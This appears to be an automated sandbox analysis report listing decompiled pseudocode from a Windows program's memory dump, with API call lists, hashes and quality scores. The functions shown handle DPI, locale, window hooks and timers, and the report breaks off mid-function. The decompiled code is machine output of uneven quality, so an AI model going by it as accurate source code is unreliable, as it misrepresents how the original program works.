                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                                • String ID:
                                                                                • API String ID: 3404767174-0
                                                                                • Opcode ID: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction ID: 7cb591e502674757c5b69656be4cbc4188d227aadbe7795b2df51ffe080876a5
                                                                                • Opcode Fuzzy Hash: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction Fuzzy Hash: 78015E71644108ABD611EB98DDC1F9A33ADEB08344F104526F905E73D2DB75E89187BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 40%
                                                                                			E00420814(intOrPtr __eax) {
                                                                                				char _v5;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t30;
                                                                                				void* _t32;
                                                                                				void* _t34;
                                                                                				intOrPtr _t35;
                                                                                
                                                                                				_t32 = _t34;
                                                                                				_t35 = _t34 + 0xfffffff8;
                                                                                				_v5 = 0;
                                                                                				if( *0x487a28 == 0) {
                                                                                					return _v5;
                                                                                				} else {
                                                                                					_push(0);
                                                                                					L00406E20();
                                                                                					_v12 = __eax;
                                                                                					_push(_t32);
                                                                                					_push(0x42089a);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t35;
                                                                                					_push(0x68);
                                                                                					_t14 = _v12;
                                                                                					_push(_t14);
                                                                                					L00406AF8();
                                                                                					if(_t14 >= 0x10) {
                                                                                						_push(__eax + 4);
                                                                                						_push(8);
                                                                                						_push(0);
                                                                                						_t18 =  *0x487a28; // 0x510805d2
                                                                                						_push(_t18);
                                                                                						L00406B20();
                                                                                						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                                                                						_push(8);
                                                                                						_push(8);
                                                                                						_t21 =  *0x487a28; // 0x510805d2
                                                                                						_push(_t21);
                                                                                						L00406B20();
                                                                                						_v5 = 1;
                                                                                					}
                                                                                					_pop(_t30);
                                                                                					 *[fs:eax] = _t30;
                                                                                					_push(0x4208a1);
                                                                                					_t16 = _v12;
                                                                                					_push(_t16);
                                                                                					_push(0);
                                                                                					L00407080();
                                                                                					return _t16;
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 0042082C
                                                                                • 72E7AD70.GDI32(?,00000068,00000000,0042089A,?,00000000), ref: 00420848
                                                                                • 72E7AEA0.GDI32(510805D2,00000000,00000008,?,?,00000068,00000000,0042089A,?,00000000), ref: 00420860
                                                                                • 72E7AEA0.GDI32(510805D2,00000008,00000008,?,510805D2,00000000,00000008,?,?,00000068,00000000,0042089A,?,00000000), ref: 00420878
                                                                                • 72E7B380.USER32(00000000,?,004208A1,0042089A,?,00000000), ref: 00420894
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B380
                                                                                • String ID:
                                                                                • API String ID: 120756276-0
                                                                                • Opcode ID: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction ID: 594b4552e34af1e9033683bc2504567bb3921c278d2cf1e53935ece89b8d96ff
                                                                                • Opcode Fuzzy Hash: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction Fuzzy Hash: F81148317483046EEB00EBA4EC92F6E7BE8E708714F5040AAF604EA5C1C9B99404C368
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E00461FD4(int __eax) {
                                                                                				int _v8;
                                                                                				int _t20;
                                                                                				int _t22;
                                                                                				intOrPtr _t29;
                                                                                				int _t32;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t36;
                                                                                
                                                                                				_t34 = _t36;
                                                                                				_t22 = __eax;
                                                                                				if( *((char*)(__eax + 0x2e8)) == 1) {
                                                                                					return __eax;
                                                                                				} else {
                                                                                					_push(0);
                                                                                					L00406E20();
                                                                                					_v8 = __eax;
                                                                                					_push(_t34);
                                                                                					_push(0x462059);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t36;
                                                                                					_push(0x48);
                                                                                					_t11 = _v8;
                                                                                					L00406AF8();
                                                                                					_t32 = MulDiv(E0041EDD0( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
                                                                                					 *(_t22 + 0x2b0) = _t32;
                                                                                					E0045F9D0(_t22, MulDiv(_t32, 0x78, 0x64));
                                                                                					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
                                                                                					_t29 = 0x5a;
                                                                                					 *[fs:eax] = _t29;
                                                                                					_push(0x462060);
                                                                                					_t20 = _v8;
                                                                                					_push(_t20);
                                                                                					_push(0);
                                                                                					L00407080();
                                                                                					return _t20;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 00461FE7
                                                                                • 72E7AD70.GDI32(?,0000005A,00000048,00000000,00462059,?,00000000), ref: 00462005
                                                                                  • Part of subcall function 0041EDD0: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041EDE1
                                                                                • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462014
                                                                                • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00462026
                                                                                • 72E7B380.USER32(00000000,?,00462060,00000000,00000000,?,0000005A,00000048,00000000,00462059,?,00000000), ref: 00462053
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B380
                                                                                • String ID:
                                                                                • API String ID: 120756276-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00409B90(void* __esi, void* __eflags) {
                                                                                				char _v8;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr _t26;
                                                                                				void* _t27;
                                                                                				long _t29;
                                                                                				intOrPtr _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __eflags;
                                                                                				_push(0);
                                                                                				_push(_t32);
                                                                                				_push(0x409c27);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t32;
                                                                                				E00409908(GetThreadLocale(), 0x409c3c, 0x100b,  &_v8);
                                                                                				_t29 = E00408708(0x409c3c, 1, _t33);
                                                                                				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                					EnumCalendarInfoA(E00409ADC, GetThreadLocale(), _t29, 4);
                                                                                					_t27 = 7;
                                                                                					_t18 = 0x48781c;
                                                                                					do {
                                                                                						 *_t18 = 0xffffffff;
                                                                                						_t18 = _t18 + 4;
                                                                                						_t27 = _t27 - 1;
                                                                                					} while (_t27 != 0);
                                                                                					EnumCalendarInfoA(E00409B18, GetThreadLocale(), _t29, 3);
                                                                                				}
                                                                                				_pop(_t26);
                                                                                				 *[fs:eax] = _t26;
                                                                                				_push(E00409C2E);
                                                                                				return E00404320( &_v8);
                                                                                			}











                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409C27,?,?,00000000), ref: 00409BA8
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409C27,?,?,00000000), ref: 00409BD8
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009ADC,00000000,00000000,00000004), ref: 00409BE3
                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409C27,?,?,00000000), ref: 00409C01
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009B18,00000000,00000000,00000003), ref: 00409C0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                • String ID:
                                                                                • API String ID: 4102113445-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453F88() {
                                                                                				void* _t2;
                                                                                				void* _t5;
                                                                                				void* _t8;
                                                                                				struct HHOOK__* _t10;
                                                                                
                                                                                				if( *0x487c14 != 0) {
                                                                                					_t10 =  *0x487c14; // 0x0
                                                                                					UnhookWindowsHookEx(_t10);
                                                                                				}
                                                                                				 *0x487c14 = 0;
                                                                                				if( *0x487c18 != 0) {
                                                                                					_t2 =  *0x487c10; // 0x0
                                                                                					SetEvent(_t2);
                                                                                					if(GetCurrentThreadId() !=  *0x487c0c) {
                                                                                						_t8 =  *0x487c18; // 0x0
                                                                                						WaitForSingleObject(_t8, 0xffffffff);
                                                                                					}
                                                                                					_t5 =  *0x487c18; // 0x0
                                                                                					CloseHandle(_t5);
                                                                                					 *0x487c18 = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				return 0;
                                                                                			}








                                                                                APIs
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00453F97
                                                                                • SetEvent.KERNEL32(00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FB2
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453FB7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FCC
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                • String ID:
                                                                                • API String ID: 2429646606-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E0045EE44(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				signed int _v9;
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				char _v21;
                                                                                				char _v124;
                                                                                				char _v132;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t145;
                                                                                				intOrPtr _t169;
                                                                                				intOrPtr _t171;
                                                                                				intOrPtr _t172;
                                                                                				intOrPtr _t173;
                                                                                				signed int _t177;
                                                                                				signed int _t184;
                                                                                				intOrPtr _t193;
                                                                                				signed int _t197;
                                                                                				signed int _t204;
                                                                                				intOrPtr _t213;
                                                                                				intOrPtr _t215;
                                                                                				signed int _t224;
                                                                                				signed int _t237;
                                                                                				signed int _t240;
                                                                                				void* _t248;
                                                                                				void* _t252;
                                                                                				signed int _t253;
                                                                                				intOrPtr _t268;
                                                                                				intOrPtr _t284;
                                                                                				void* _t295;
                                                                                				signed int _t297;
                                                                                				intOrPtr _t304;
                                                                                
                                                                                				_v9 = __ecx;
                                                                                				_t253 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t294 = _a8;
                                                                                				_v21 = 0;
                                                                                				E0045FCF8(_v8, __edx, _a8, _t295);
                                                                                				_t145 = _v8;
                                                                                				_t305 =  *(_t145 + 0x1c) & 0x00000010;
                                                                                				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
                                                                                					L5:
                                                                                					__eflags = _t253;
                                                                                					if(_t253 != 0) {
                                                                                						L8:
                                                                                						__eflags = _t253;
                                                                                						if(_t253 != 0) {
                                                                                							L37:
                                                                                							_push(0x45f1ef);
                                                                                							_push( *[fs:eax]);
                                                                                							 *[fs:eax] = _t304;
                                                                                							E00436C60(_v8, _t253, _a4, _t294);
                                                                                							_pop(_t268);
                                                                                							 *[fs:eax] = _t268;
                                                                                							return 0;
                                                                                						}
                                                                                						E0045C76C(_v8,  &_v124);
                                                                                						_t296 =  *_v8;
                                                                                						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
                                                                                						__eflags =  *((char*)(_v8 + 0x28e));
                                                                                						if(__eflags != 0) {
                                                                                							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
                                                                                							if(__eflags == 0) {
                                                                                								_t296 = 0xffc8;
                                                                                								_t237 = E004037B0(_v8, __eflags);
                                                                                								__eflags = _t237;
                                                                                								if(_t237 != 0) {
                                                                                									_t240 = E004350A4(_v8) -  *(_v8 + 0x264);
                                                                                									__eflags = _t240;
                                                                                									 *(_v8 + 0x264) = _t240;
                                                                                								}
                                                                                							}
                                                                                							return E0045D160(_v8, _t253,  &_v124, _t294, _t296);
                                                                                						}
                                                                                						_t259 = _a4;
                                                                                						E0045C710(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
                                                                                						_t169 = _v8;
                                                                                						_t297 = _v20;
                                                                                						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
                                                                                						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
                                                                                							L25:
                                                                                							_t171 = _v8;
                                                                                							__eflags =  *(_t171 + 0x249) & 0x00000001;
                                                                                							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
                                                                                								L31:
                                                                                								_t172 = _v8;
                                                                                								__eflags =  *(_t172 + 0x249) & 0x00000002;
                                                                                								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
                                                                                									__eflags = _v16;
                                                                                									if(_v16 >= 0) {
                                                                                										_t173 = _v8;
                                                                                										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
                                                                                										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
                                                                                											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
                                                                                											if(__eflags <= 0) {
                                                                                												_t177 = _v20;
                                                                                												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
                                                                                												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
                                                                                												E0041295C(_t294,  &_v132, _a4);
                                                                                												_push( &_v132);
                                                                                												_t184 = E004037B0(_v8, __eflags);
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													 *((char*)(_v8 + 0x28e)) = 5;
                                                                                													 *((intOrPtr*)( *_v8 + 0x88))();
                                                                                													E0045D2A0(_v8, _t253, _t294, 0xffa3);
                                                                                													_v21 = 1;
                                                                                													SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L37;
                                                                                							}
                                                                                							__eflags = _v20;
                                                                                							if(_v20 < 0) {
                                                                                								goto L31;
                                                                                							}
                                                                                							_t193 = _v8;
                                                                                							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
                                                                                							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
                                                                                								goto L31;
                                                                                							}
                                                                                							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
                                                                                							if(__eflags > 0) {
                                                                                								goto L31;
                                                                                							}
                                                                                							_t197 = _v16;
                                                                                							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
                                                                                							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
                                                                                							E0041295C(_t294,  &_v132, _a4);
                                                                                							_push( &_v132);
                                                                                							_t204 = E004037B0(_v8, __eflags);
                                                                                							__eflags = _t204;
                                                                                							if(_t204 != 0) {
                                                                                								 *((char*)(_v8 + 0x28e)) = 4;
                                                                                								 *((intOrPtr*)( *_v8 + 0x88))();
                                                                                								E0045D2A0(_v8, _t253, _t294, 0xffa2);
                                                                                								_v21 = 1;
                                                                                								SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t213 = _v8;
                                                                                						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
                                                                                						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
                                                                                							goto L25;
                                                                                						}
                                                                                						_t215 = _v8;
                                                                                						__eflags =  *(_t215 + 0x249) & 0x00000004;
                                                                                						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
                                                                                							 *((char*)(_v8 + 0x28e)) = 1;
                                                                                							SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
                                                                                							__eflags = _v9 & 0x00000001;
                                                                                							if((_v9 & 0x00000001) == 0) {
                                                                                								E0045DDD8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
                                                                                							} else {
                                                                                								E0045DD50(_v8, _t259,  &_v20, _t294);
                                                                                							}
                                                                                							goto L37;
                                                                                						}
                                                                                						_t284 = _v8;
                                                                                						_t224 = _v20;
                                                                                						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
                                                                                						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
                                                                                							L20:
                                                                                							E0045DDD8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
                                                                                							E0045FDD4(_v8, _t294, _t297);
                                                                                							L21:
                                                                                							E004037B0(_v8, __eflags);
                                                                                							goto L37;
                                                                                						}
                                                                                						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
                                                                                						if(__eflags != 0) {
                                                                                							goto L20;
                                                                                						}
                                                                                						E0045B6B8(_v8);
                                                                                						goto L21;
                                                                                					}
                                                                                					__eflags = _v9 & 0x00000040;
                                                                                					if(__eflags == 0) {
                                                                                						goto L8;
                                                                                					} else {
                                                                                						E004037B0(_v8, __eflags);
                                                                                						goto L37;
                                                                                					}
                                                                                				}
                                                                                				if(E004037B0(_v8, _t305) != 0) {
                                                                                					L3:
                                                                                					 *((intOrPtr*)( *_v8 + 0xc0))();
                                                                                					_t248 = E0045B628(_v8, _t307);
                                                                                					_t308 = _t248;
                                                                                					if(_t248 == 0) {
                                                                                						return E004358D8(_v8, 0, _t308);
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                				_t252 = E0044CA54(_v8);
                                                                                				_t307 = _t252;
                                                                                				if(_t252 != 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L3;
                                                                                			}






































                                                                                APIs
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F019
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F104
                                                                                • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F1C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Timer
                                                                                • String ID: @
                                                                                • API String ID: 2870079774-2766056989
                                                                                • Opcode ID: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction ID: 31ec200aa90f8bbc8c52e6f19b9a0b11fb317160e962f7965f8f07b22054e6eb
                                                                                • Opcode Fuzzy Hash: b749929822256d500e5e7cd3c26b9152d8cdae2a96eb2474c38fca25822bfe95
                                                                                • Instruction Fuzzy Hash: 3AC13D34A00209EFDB10DB99C589BDEB7F5AF44305F2441A6EC04AB392D778AF49DB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E00409C40(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				void* _t41;
                                                                                				signed int _t45;
                                                                                				signed int _t47;
                                                                                				signed int _t49;
                                                                                				signed int _t51;
                                                                                				intOrPtr _t75;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				signed int _t83;
                                                                                				signed int _t92;
                                                                                				intOrPtr _t111;
                                                                                				void* _t122;
                                                                                				void* _t124;
                                                                                				intOrPtr _t127;
                                                                                				void* _t128;
                                                                                
                                                                                				_t128 = __eflags;
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_t122 = __edx;
                                                                                				_t124 = __eax;
                                                                                				_push(_t127);
                                                                                				_push(0x409e0a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t127;
                                                                                				_t92 = 1;
                                                                                				E00404320(__edx);
                                                                                				E00409908(GetThreadLocale(), 0x409e20, 0x1009,  &_v12);
                                                                                				if(E00408708(0x409e20, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                					while(1) {
                                                                                						_t41 = E004045D8(_t124);
                                                                                						__eflags = _t92 - _t41;
                                                                                						if(_t92 > _t41) {
                                                                                							goto L28;
                                                                                						}
                                                                                						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                                						asm("bt [0x46b0c0], eax");
                                                                                						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                                							_t45 = E00408C80(_t124 + _t92 - 1, 2, 0x409e24);
                                                                                							__eflags = _t45;
                                                                                							if(_t45 != 0) {
                                                                                								_t47 = E00408C80(_t124 + _t92 - 1, 4, 0x409e34);
                                                                                								__eflags = _t47;
                                                                                								if(_t47 != 0) {
                                                                                									_t49 = E00408C80(_t124 + _t92 - 1, 2, 0x409e4c);
                                                                                									__eflags = _t49;
                                                                                									if(_t49 != 0) {
                                                                                										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                                										__eflags = _t51;
                                                                                										if(_t51 == 0) {
                                                                                											L24:
                                                                                											E004045E0(_t122, 0x409e64);
                                                                                										} else {
                                                                                											__eflags = _t51 != 0x20;
                                                                                											if(_t51 != 0x20) {
                                                                                												E00404500();
                                                                                												E004045E0(_t122, _v24);
                                                                                											} else {
                                                                                												goto L24;
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										E004045E0(_t122, 0x409e58);
                                                                                										_t92 = _t92 + 1;
                                                                                									}
                                                                                								} else {
                                                                                									E004045E0(_t122, 0x409e44);
                                                                                									_t92 = _t92 + 3;
                                                                                								}
                                                                                							} else {
                                                                                								E004045E0(_t122, 0x409e30);
                                                                                								_t92 = _t92 + 1;
                                                                                							}
                                                                                							_t92 = _t92 + 1;
                                                                                							__eflags = _t92;
                                                                                						} else {
                                                                                							_v8 = E0040A988(_t124, _t92);
                                                                                							E00404830(_t124, _v8, _t92,  &_v20);
                                                                                							E004045E0(_t122, _v20);
                                                                                							_t92 = _t92 + _v8;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t75 =  *0x4877f4; // 0x9
                                                                                					_t76 = _t75 - 4;
                                                                                					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                						_t77 = 1;
                                                                                					} else {
                                                                                						_t77 = 0;
                                                                                					}
                                                                                					if(_t77 == 0) {
                                                                                						E00404374(_t122, _t124);
                                                                                					} else {
                                                                                						while(_t92 <= E004045D8(_t124)) {
                                                                                							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                                							__eflags = _t83;
                                                                                							if(_t83 != 0) {
                                                                                								__eflags = _t83 != 0x20;
                                                                                								if(_t83 != 0x20) {
                                                                                									E00404500();
                                                                                									E004045E0(_t122, _v16);
                                                                                								}
                                                                                							}
                                                                                							_t92 = _t92 + 1;
                                                                                							__eflags = _t92;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L28:
                                                                                				_pop(_t111);
                                                                                				 *[fs:eax] = _t111;
                                                                                				_push(E00409E11);
                                                                                				return E00404344( &_v24, 4);
                                                                                			}
























                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409E0A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409C6F
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: eeee$ggg$yyyy
                                                                                • API String ID: 4232894706-1253427255
                                                                                • Opcode ID: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction ID: 1a36ec5943870a74506374bfa0bb250890d6a6f3bc275ed72c2f61215dc1fb70
                                                                                • Opcode Fuzzy Hash: 5e1d9a834fa012a618011fc63e7f2bbf4a6495418e28e5c6248bb5b99b248ee2
                                                                                • Instruction Fuzzy Hash: C441E4B47081055BD715EB6AC8816BFB2A6DF84304B64453BE692B33C7EB3C9D02926D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00438E24(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                                                				char _v68;
                                                                                				struct _WNDCLASSA _v108;
                                                                                				intOrPtr _v116;
                                                                                				signed char _v137;
                                                                                				void* _v144;
                                                                                				struct _WNDCLASSA _v184;
                                                                                				char _v188;
                                                                                				char _v192;
                                                                                				char _v196;
                                                                                				int _t47;
                                                                                				void* _t48;
                                                                                				intOrPtr _t75;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t97;
                                                                                				void* _t98;
                                                                                				intOrPtr* _t100;
                                                                                				void* _t104;
                                                                                
                                                                                				_t98 = __edi;
                                                                                				_t83 = __ebx;
                                                                                				_push(__ebx);
                                                                                				_v196 = 0;
                                                                                				_t100 = __eax;
                                                                                				_push(_t104);
                                                                                				_push(0x438faf);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t104 + 0xffffff40;
                                                                                				_t84 =  *__eax;
                                                                                				 *((intOrPtr*)( *__eax + 0x98))();
                                                                                				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                                                					L7:
                                                                                					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
                                                                                					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                                                					asm("sbb eax, eax");
                                                                                					_t48 = _t47 + 1;
                                                                                					if(_t48 == 0 || E004324CC != _v184.lpfnWndProc) {
